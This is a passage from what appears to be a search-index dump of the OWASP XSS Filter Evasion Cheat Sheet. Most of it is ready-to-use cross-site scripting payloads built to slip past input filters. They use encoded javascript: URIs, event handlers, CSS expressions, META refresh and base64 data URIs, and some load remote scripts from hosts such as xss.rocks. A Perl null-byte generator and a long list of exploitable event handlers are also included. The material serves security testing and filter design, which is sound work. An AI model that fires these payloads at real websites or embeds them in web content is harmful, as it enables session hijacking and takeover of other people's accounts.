"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references","title":"Decimal HTML Character References","text":"

All of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).

<IMG\u00a0SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references-without-trailing-semicolons","title":"Decimal HTML Character References Without Trailing Semicolons","text":"

This is often effective in XSS that attempts to look for \"&#XX;\", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =\\~ s/.*\\&#(\\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a HTML encoded string (I've seen this in the wild):

<IMG\u00a0SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hexadecimal-html-character-references-without-trailing-semicolons","title":"Hexadecimal HTML Character References Without Trailing Semicolons","text":"

This is also a viable XSS attack against the above string $tmp_string=\\~ s/.*\\&#(\\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-tab","title":"Embedded Tab","text":"

Used to break up the cross site scripting attack:

<IMG SRC=\"jav ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-encoded-tab","title":"Embedded Encoded Tab","text":"

Use this one to break up XSS :

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-newline-to-break-up-xss","title":"Embedded Newline to Break-up XSS","text":"

Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:

<IMG\u00a0SRC=\"jav&#x0A;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-carriage-return-to-break-up-xss","title":"Embedded Carriage Return to Break-up XSS","text":"

(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG\u00a0SRC=\"jav&#x0D;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#null-breaks-up-javascript-directive","title":"Null breaks up JavaScript Directive","text":"

Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:

perl\u00a0-e\u00a0'print\u00a0\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";'\u00a0>\u00a0out

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#spaces-and-meta-chars-before-the-javascript-in-images-for-xss","title":"Spaces and Meta Chars Before the JavaScript in Images for XSS","text":"

This is useful if the pattern match doesn't take into account spaces in the word javascript: -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the javascript: keyword. The actual reality is you can have any char from 1-32 in decimal:

<IMG SRC=\" &#14; javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#non-alpha-non-digit-xss","title":"Non-alpha-non-digit XSS","text":"

The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \\<SCRIPT\\\\s != \\<SCRIPT/XSS\\\\s:

<SCRIPT/XSS\u00a0SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:

<BODY\u00a0onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n

Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#extraneous-open-brackets","title":"Extraneous Open Brackets","text":"

Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:

<<SCRIPT>alert(\"XSS\");//\\<</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#no-closing-script-tags","title":"No Closing Script Tags","text":"

In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \\></SCRIPT> portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:

<SCRIPT\u00a0SRC=http://xss.rocks/xss.js?<\u00a0B\u00a0>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-in-script-tags","title":"Protocol Resolution in Script Tags","text":"

This particular variant was submitted by \u0141ukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The \".j\" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

<SCRIPT\u00a0SRC=//xss.rocks/.j>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#half-open-htmljavascript-xss-vector","title":"Half Open HTML/JavaScript XSS Vector","text":"

Unlike Firefox the IE rendering engine doesn't add extra data to you page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close \">\" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\\\%3D)|(=))\\[^\\\\n\\]\\*((\\\\%3C)|\\<)\\[^\\\\n\\]+((\\\\%3E)|\\>)/ because it doesn't require the end \">\". As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:

<IMG\u00a0SRC=\"('XSS')\""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#double-open-angle-brackets","title":"Double Open Angle Brackets","text":"

Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

<iframe\u00a0src=http://xss.rocks/scriptlet.html\u00a0<

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#escaping-javascript-escapes","title":"Escaping JavaScript Escapes","text":"

When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=\"$ENV{QUERY\\_STRING}\";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a=\"\\\\\\\\\";alert('XSS');//\";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:

\\\";alert('XSS');//

An alternative, if correct JSON or JavaScript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:

</script><script>alert('XSS');</script>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#end-title-tag","title":"End Title Tag","text":"

This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#input-image","title":"INPUT Image","text":"

<INPUT\u00a0TYPE=\"IMAGE\"\u00a0SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-image","title":"BODY Image","text":"

<BODY\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-dynsrc","title":"IMG Dynsrc","text":"

<IMG\u00a0DYNSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-lowsrc","title":"IMG Lowsrc","text":"

<IMG\u00a0LOWSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#list-style-image","title":"List-style-image","text":"

Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

<STYLE>li\u00a0{list-style-image:\u00a0url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#vbscript-in-an-image","title":"VBscript in an Image","text":"

<IMG\u00a0SRC='vbscript:msgbox(\"XSS\")'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#livescript-older-versions-of-netscape-only","title":"Livescript (older versions of Netscape only)","text":"

<IMG\u00a0SRC=\"livescript:[code]\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#svg-object-tag","title":"SVG Object Tag","text":"

<svg/onload=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ecmascript-6","title":"ECMAScript 6","text":"
Set.constructor`alert\\x28document.domain\\x29\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-tag","title":"BODY Tag","text":"

Method doesn't require using any variants of javascript: or <SCRIPT... to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign (onload= != onload =):

<BODY\u00a0ONLOAD=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#event-handlers","title":"Event Handlers","text":"

It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.

The Dottoro Web Reference also has a nice list of events in JavaScript.

  1. FSCommand() (attacker can use this when executed from within an embedded Flash object)
  2. onAbort() (when user aborts the loading of an image)
  3. onActivate() (when object is set as the active element)
  4. onAfterPrint() (activates after user prints or previews print job)
  5. onAfterUpdate() (activates on data object after updating data in the source object)
  6. onBeforeActivate() (fires before the object is set as the active element)
  7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand(\"Copy\") function)
  8. onBeforeCut() (attacker executes the attack string right before a selection is cut)
  9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
  10. onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
  11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand(\"Paste\") function)
  12. onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand(\"Print\") function).
  13. onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
  14. onBeforeUpdate() (activates on data object before updating data in the source object)
  15. onBegin() (the onbegin event fires immediately when the element's timeline begins)
  16. onBlur() (in the case where another popup is loaded and window looses focus)
  17. onBounce() (fires when the behavior property of the marquee object is set to \"alternate\" and the contents of the marquee reach one side of the window)
  18. onCellChange() (fires when data changes in the data provider)
  19. onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
  20. onClick() (someone clicks on a form)
  21. onContextMenu() (user would need to right click on attack area)
  22. onControlSelect() (fires when the user is about to make a control selection of the object)
  23. onCopy() (user needs to copy something or it can be exploited using the execCommand(\"Copy\") command)
  24. onCut() (user needs to copy something or it can be exploited using the execCommand(\"Cut\") command)
  25. onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
  26. onDataSetChanged() (fires when the data set exposed by a data source object changes)
  27. onDataSetComplete() (fires to indicate that all data is available from the data source object)
  28. onDblClick() (user double-clicks a form element or a link)
  29. onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
  30. onDrag() (requires that the user drags an object)
  31. onDragEnd() (requires that the user drags an object)
  32. onDragLeave() (requires that the user drags an object off a valid location)
  33. onDragEnter() (requires that the user drags an object into a valid location)
  34. onDragOver() (requires that the user drags an object into a valid location)
  35. onDragDrop() (user drops an object (e.g. file) onto the browser window)
  36. onDragStart() (occurs when user starts drag operation)
  37. onDrop() (user drops an object (e.g. file) onto the browser window)
  38. onEnd() (the onEnd event fires when the timeline ends.
  39. onError() (loading of a document or image causes an error)
  40. onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
  41. onFilterChange() (fires when a visual filter completes state change)
  42. onFinish() (attacker can create the exploit when marquee is finished looping)
  43. onFocus() (attacker executes the attack string when the window gets focus)
  44. onFocusIn() (attacker executes the attack string when window gets focus)
  45. onFocusOut() (attacker executes the attack string when window looses focus)
  46. onHashChange() (fires when the fragment identifier part of the document's current address changed)
  47. onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
  48. onInput() (the text content of an element is changed through the user interface)
  49. onKeyDown() (user depresses a key)
  50. onKeyPress() (user presses or holds down a key)
  51. onKeyUp() (user releases a key)
  52. onLayoutComplete() (user would have to print or print preview)
  53. onLoad() (attacker executes the attack string after the window loads)
  54. onLoseCapture() (can be exploited by the releaseCapture() method)
  55. onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
  56. onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
  57. onMessage() (fire when the document received a message)
  58. onMouseDown() (the attacker would need to get the user to click on an image)
  59. onMouseEnter() (cursor moves over an object or area)
  60. onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
  61. onMouseMove() (the attacker would need to get the user to mouse over an image or table)
  62. onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
  63. onMouseOver() (cursor moves over an object or area)
  64. onMouseUp() (the attacker would need to get the user to click on an image)
  65. onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
  66. onMove() (user or attacker would move the page)
  67. onMoveEnd() (user or attacker would move the page)
  68. onMoveStart() (user or attacker would move the page)
  69. onOffline() (occurs if the browser is working in online mode and it starts to work offline)
  70. onOnline() (occurs if the browser is working in offline mode and it starts to work online)
  71. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
  72. onPaste() (user would need to paste or attacker could use the execCommand(\"Paste\") function)
  73. onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
  74. onPopState() (fires when user navigated the session history)
  75. onProgress() (attacker would use this as a flash movie was loading)
  76. onPropertyChange() (user or attacker would need to change an element property)
  77. onReadyStateChange() (user or attacker would need to change an element property)
  78. onRedo() (user went forward in undo transaction history)
  79. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
  80. onReset() (user or attacker resets a form)
  81. onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  82. onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  83. onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  84. onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
  85. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
  86. onRowsEnter() (user or attacker would need to change a row in a data source)
  87. onRowExit() (user or attacker would need to change a row in a data source)
  88. onRowDelete() (user or attacker would need to delete a row in a data source)
  89. onRowInserted() (user or attacker would need to insert a row in a data source)
  90. onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
  91. onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
  92. onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  93. onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  94. onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  95. onStart() (fires at the beginning of each marquee loop)
  96. onStop() (user would need to press the stop button or leave the webpage)
  97. onStorage() (storage area changed)
  98. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
  99. onSubmit() (requires attacker or user submits a form)
  100. onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
  101. onTrackChange() (user or attacker changes track in a playList)
  102. onUndo() (user went backward in undo transaction history)
  103. onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
  104. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
  105. seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#bgsound","title":"BGSOUND","text":"

<BGSOUND SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-includes","title":"& JavaScript includes","text":"

<BR\u00a0SIZE=\"&{alert('XSS')}\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-sheet","title":"STYLE sheet","text":"

<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet","title":"Remote style sheet","text":"

Using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

<LINK\u00a0REL=\"stylesheet\"\u00a0HREF=\"http://xss.rocks/xss.css\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-2","title":"Remote style sheet part 2","text":"

This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-3","title":"Remote style sheet part 3","text":"

This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:

<META\u00a0HTTP-EQUIV=\"Link\"\u00a0Content=\"<http://xss.rocks/xss.css>;\u00a0REL=stylesheet\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-4","title":"Remote style sheet part 4","text":"

This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:

<STYLE>BODY{-moz-binding:url(\"http://xss.rocks/xssmoz.xml#xss\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tags-with-broken-up-javascript-for-xss","title":"STYLE Tags with Broken-up JavaScript for XSS","text":"

This XSS at times sends IE into an infinite loop of alerts:

<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-attribute-using-a-comment-to-break-up-expression","title":"STYLE Attribute using a Comment to Break-up Expression","text":"

Created by Roman Ivanov

<IMG\u00a0STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-style-with-expression","title":"IMG STYLE with Expression","text":"

This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:

exp/*<A\u00a0STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-older-versions-of-netscape-only","title":"STYLE Tag (Older versions of Netscape only)","text":"

<STYLE\u00a0TYPE=\"text/javascript\">alert('XSS');</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background-image","title":"STYLE Tag using Background-image","text":"

<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A\u00a0CLASS=XSS></A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background","title":"STYLE Tag using Background","text":"

<STYLE\u00a0type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <STYLE type=\"text/css\">BODY{background:url(\"<javascript:alert>('XSS')\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#anonymous-html-with-style-attribute","title":"Anonymous HTML with STYLE Attribute","text":"

IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:

<XSS\u00a0STYLE=\"xss:expression(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#local-htc-file","title":"Local htc File","text":"

This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

<XSS STYLE=\"behavior: url(xss.htc);\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#us-ascii-encoding","title":"US-ASCII Encoding","text":"

US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.

\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta","title":"META","text":"

The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-using-data","title":"META using Data","text":"

Directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=data:text/html\u00a0base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-with-additional-url-parameter","title":"META with Additional URL Parameter","text":"

If the target website attempts to see if the URL contains <http://>; at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;\u00a0URL=http://;URL=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe","title":"IFRAME","text":"

If iframes are allowed there are a lot of other XSS problems as well:

<IFRAME\u00a0SRC=\"javascript:alert('XSS');\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe-event-based","title":"IFRAME Event Based","text":"

IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)

<IFRAME\u00a0SRC=#\u00a0onmouseover=\"alert(document.cookie)\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#frame","title":"FRAME","text":"

Frames have the same sorts of XSS problems as iframes

<FRAMESET><FRAME\u00a0SRC=\"javascript:alert('XSS');\"></FRAMESET>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#table","title":"TABLE","text":"

<TABLE\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#td","title":"TD","text":"

Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:

<TABLE><TD\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div","title":"DIV","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image","title":"DIV Background-image","text":"

<DIV\u00a0STYLE=\"background-image:\u00a0url(javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-with-unicoded-xss-exploit","title":"DIV Background-image with Unicoded XSS Exploit","text":"

This has been modified slightly to obfuscate the URL parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

<DIV\u00a0STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-plus-extra-characters","title":"DIV Background-image Plus Extra Characters","text":"

Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<DIV\u00a0STYLE=\"background-image:\u00a0url(\u0001javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-expression","title":"DIV Expression","text":"

A variant of this was effective against a real world cross site scripting filter using a newline between the colon and \"expression\":

<DIV\u00a0STYLE=\"width:\u00a0expression(alert('XSS'));\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#downlevel-hidden-block","title":"Downlevel-Hidden Block","text":"

Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

<!--[if\u00a0gte\u00a0IE\u00a04]>\n<SCRIPT>alert('XSS');</SCRIPT>\n<![endif]-->\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base-tag","title":"BASE Tag","text":"

Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg rather than full paths. If the path includes a leading forward slash like /images/image.jpg you can remove one slash from this vector (as long as there are two to begin the comment this will work):

<BASE\u00a0HREF=\"javascript:alert('XSS');//\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#object-tag","title":"OBJECT Tag","text":"

If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

<OBJECT\u00a0TYPE=\"text/x-scriptlet\"\u00a0DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-a-flash-movie-that-contains-xss","title":"EMBED a Flash Movie That Contains XSS","text":"

Click here for a demo: ~~http://ha.ckers.org/xss.swf~~

<EMBED\u00a0SRC=\"http://ha.ckers.org/xss.swf\"\u00a0AllowScriptAccess=\"always\"></EMBED>

If you add the attributes allowScriptAccess=\"never\" and allownetworking=\"internal\" it can mitigate this risk (thank you to Jonathan Vanasco for the info).

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-svg-which-contains-xss-vector","title":"EMBED SVG Which Contains XSS Vector","text":"

This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.

